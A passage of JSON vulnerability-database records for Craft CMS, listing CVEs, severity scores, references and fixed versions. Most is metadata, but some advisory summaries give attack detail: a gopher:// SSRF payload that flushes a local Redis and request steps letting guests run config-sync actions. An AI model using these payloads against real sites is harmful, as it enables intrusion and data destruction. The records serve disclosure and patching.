5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28784","GHSA-qc86-q28f-ggww"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-azr5-12f8-hfbm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56366?format=json","vulnerability_id":"VCID-c2nk-y4rx-1qf4","summary":"Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled\nYou are affected if your php.ini configuration has `register_argc_argv` enabled.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56145","reference_id":"","reference_type":"","scores":[{"value":"0.93926","scoring_system":"epss","scoring_elements":"0.99888","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56145"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/82e893fb794d30563da296bca31379c0df0079b3","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-06-06T03:55:30Z/"}],"url":"https://github.com/craftcms/cms/commit/82e893fb794d30563da296bca31379c0df0079b3"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-56145","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-56145"},{"reference_url":"https://github.com/Chocapikk/CVE-2024-56145","reference_id":"CVE-2024-56145","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Chocapikk/CVE-2024-56145"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56145","reference_id":"CVE-2024-56145","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56145"},{"reference_url":"https://github.com/advisories/GHSA-2p6p-9rc9-62j9","reference_id":"GHSA-2p6p-9rc9-62j9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2p6p-9rc9-62j9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9","reference_id":"GHSA-2p6p-9rc9-62j9","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-06-06T03:55:30Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83573?format=json","purl":"pkg:composer/craftcms/cms@4.13.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.13.2"},{"url":"http://public2.vulnerablecode.io/api/packages/83572?format=json","purl":"pkg:composer/craftcms/cms@5.5.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.5.2"}],"aliases":["CVE-2024-56145","GHSA-2p6p-9rc9-62j9"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-c2nk-y4rx-1qf4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50072?format=json","vulnerability_id":"VCID-cys8-jnmu-77ec","summary":"Craft CMS Vulnerable to SSRF in GraphQL Asset Mutation via Alternative IP Notation\nThe `saveAsset` GraphQL mutation uses `filter_var(..., FILTER_VALIDATE_IP)` to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25494","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05057","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25494"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/d49e93e5ba0c48939ce5eaa6cd9b4a990542d8b2","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:49Z/"}],"url":"https://github.com/craftcms/cms/commit/d49e93e5ba0c48939ce5eaa6cd9b4a990542d8b2"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:49Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25494","reference_id":"CVE-2026-25494","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25494"},{"reference_url":"https://github.com/advisories/GHSA-m5r2-8p9x-hp5m","reference_id":"GHSA-m5r2-8p9x-hp5m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m5r2-8p9x-hp5m"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-m5r2-8p9x-hp5m","reference_id":"GHSA-m5r2-8p9x-hp5m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:49Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-m5r2-8p9x-hp5m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73947?format=json","purl":"pkg:composer/craftcms/cms@4.16.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.18"},{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25494","GHSA-m5r2-8p9x-hp5m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cys8-jnmu-77ec"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89237?format=json","vulnerability_id":"VCID-e94m-mj1k-8kbr","summary":"Server-Side Request Forgery (SSRF) in Craft CMS with Asset Uploads Mutations\n## Required Permissions\n\nThe exploitation requires a few permissions to be enabled in the used GraphQL schema:\n\n* \"Edit assets in the <VolumeName> volume\"\n* \"Create assets in the <VolumeName> volume\"\n\n## Details\n\nThe implementation fails to restrict the URL Scheme. While the application is intended to \"upload assets\", there is no whitelist forcing `http` or `https`. This allows attackers to use the Gopher protocol to wrap raw TCP commands.\n\n**Impact:** Combined with the DWORD bypass, an attacker can hit internal services without triggering any \"127.0.0.1\" string-matching filters.\n\n**Example Payload:** gopher://2130706433:6379/_FLUSHALL (Targets local Redis via DWORD).\n\n**Remediation Strategy**\n\nTo prevent mathematical IP obfuscation, the application must normalize the hostname before validation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41129","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13052","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41129"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/d20aecfaa0eae076c4154be3b17e1f9fa05ce46f","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-22T17:52:52Z/"}],"url":"https://github.com/craftcms/cms/commit/d20aecfaa0eae076c4154be3b17e1f9fa05ce46f"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-3m9m-24vh-39wx","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-22T17:52:52Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-3m9m-24vh-39wx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41129","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41129"},{"reference_url":"https://github.com/advisories/GHSA-3m9m-24vh-39wx","reference_id":"GHSA-3m9m-24vh-39wx","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3m9m-24vh-39wx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110279?format=json","purl":"pkg:composer/craftcms/cms@4.17.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.9"},{"url":"http://public2.vulnerablecode.io/api/packages/110278?format=json","purl":"pkg:composer/craftcms/cms@5.9.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-asek-4gme-gug8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.15"}],"aliases":["CVE-2026-41129","GHSA-3m9m-24vh-39wx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e94m-mj1k-8kbr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91200?format=json","vulnerability_id":"VCID-eaxm-rjr7-xudb","summary":"Craft CMS: Unauthenticated Users Can Perform Restricted Project Config Sync Operations\n### Summary\nGuest users can access Config Sync updater `index`, obtain signed `data`, and execute state-changing Config Sync actions (`regenerate-yaml`, `apply-yaml-changes`) without authentication.\n\n### Details\n\n`ConfigSyncController` extends `BaseUpdaterController`, and the base updater is anonymously accessible for control panel requests.  `index` emits signed updater state (`data`), which can be reused by guests in subsequent requests.\n\nSensitive actions that are reachable via this method are `actionApplyYamlChanges`, `actionRegenerateYaml`, `applyExternalChanges`, and  `regenerateExternalConfig`.\n\n#### Reproduction steps\n\n1. Guest POST to:\n\n    http POST /admin/actions/config-sync/index\n\n  2. Extract data from returned JS state:\n\n    Craft.updater = ... setState({\"data\":\"<signedData>\", ...});\n\n  3. Reuse data as a guest:\n\n```\n  POST /admin/actions/config-sync/regenerate-yaml\n  data=<signedData>&<csrfParam>=<csrfToken>\n```\n\n  or\n\n```\n  POST /admin/actions/config-sync/apply-yaml-changes\n  data=<signedData>&<csrfParam>=<csrfToken>\n```\n\n  4. Observe completed response and state/file changes.\n\n### Impact\n\nUnauthenticated users can execute project configuration sync operations that should be restricted to trusted admin/deployment contexts.\n\nDepending on the pending YAML/config state, this can cause unauthorized config state transitions and a service integrity risk.\n\n### Resources\n\nhttps://github.com/craftcms/cms/commit/7f0ead833f7","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33159","reference_id":"","reference_type":"","scores":[{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06623","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33159"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7f0ead833f7c2b91ae12003caad833479dd08592","reference_id